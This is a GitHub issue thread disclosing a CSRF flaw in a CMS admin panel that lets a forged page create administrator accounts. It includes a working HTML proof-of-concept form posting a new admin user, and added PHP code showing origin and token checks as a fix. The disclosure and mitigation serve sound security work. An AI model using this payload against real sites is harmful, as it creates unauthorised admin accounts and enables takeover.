CSRF issue that allows attacker to create an account #187

Open
fvi-att opened this issue Mar 27, 2018 · 2 comments

fvi-att commented Mar 27, 2018

Hello. I'd like to report a security issue on the admin page.

Summary

This vuln is a CSRF vuln that allows creating any kind of account.

When an attacker induces authorized victims to visit a malicious webpage and makes them send requests, a victim creates an account without their intent.

Reproduce

This is how to reproduce.

  1. Access the HTML page that contains the payload after you log in to the admin (/en_US/admin/) page.

Then you find that an admin account named [test] has been created.

Payloads

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="email" value="test&#64;example&#46;com" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="status" value="0" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="password2" value="testtest" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;" value="" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;&#91;&#93;" value="1" />
      <input type="hidden" name="welcome&#95;message" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I think this security issue is not serious, because an attack using this vulnerability requires induction.

Event

  • 2018-03-15 This vulnerability was discovered.
  • 2018-03-27 Opened an issue on GitHub.

botchris (Collaborator) commented Apr 4, 2018

Fixing CSRF in QACMS in general may produce several problems, as QACMS heavily relies on AJAX and dynamic form building. We could try to secure certain sections of the CMS, such as content/user editing forms, etc.
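
One way to cover both AJAX calls and classic form posts with a single server-side check, as an added example in plain PHP (not part of the original thread, and not QuickAppsCMS or CakePHP code). The function names, the `X-CSRF-Token` header, the `_csrfToken` field and the `cms.example.com` origin are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper names, not QuickAppsCMS or CakePHP code.

/** Create the per-session token once; embed it in forms or a <meta> tag for AJAX. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

/** Return true only if a state-changing request proves it came from our own pages. */
function csrf_request_allowed(array $server, array $post, array $session, string $siteOrigin): bool
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? 'GET');
    if (in_array($method, ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods must never change state
    }
    // 1. Browsers attach Origin to cross-site form POSTs; reject foreign ones.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $siteOrigin) {
        return false;
    }
    // 2. Token from an AJAX header or, for classic forms, a hidden field.
    $sent = $server['HTTP_X_CSRF_TOKEN'] ?? $post['_csrfToken'] ?? '';
    $expected = $session['csrf'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Constructed requests for the user-add endpoint from the report.
$site = 'https://cms.example.com';
$session = [];
$token = csrf_issue_token($session);

$forged = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'];
$forgedPost = ['username' => 'test', 'roles' => ['_ids' => ['1']]];
$ajax = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site, 'HTTP_X_CSRF_TOKEN' => $token];
$form = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site];

var_dump(csrf_request_allowed($forged, $forgedPost, $session, $site));            // cross-site form
var_dump(csrf_request_allowed($ajax, ['username' => 'test'], $session, $site));   // AJAX with header
var_dump(csrf_request_allowed($form, ['_csrfToken' => $token], $session, $site)); // form with field
var_dump(csrf_request_allowed($form, ['username' => 'test'], $session, $site));   // same origin, no token
```

Because the token can travel in a request header, dynamically built forms do not each need a hidden field; a single AJAX setup hook that attaches the header is enough.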

@NicoleG25

@ChristopherCastro do you plan to address this? Note that a CVE was assigned to this issue.
If you disagree with the assignment you may contact MITRE directly to reject the CVE.
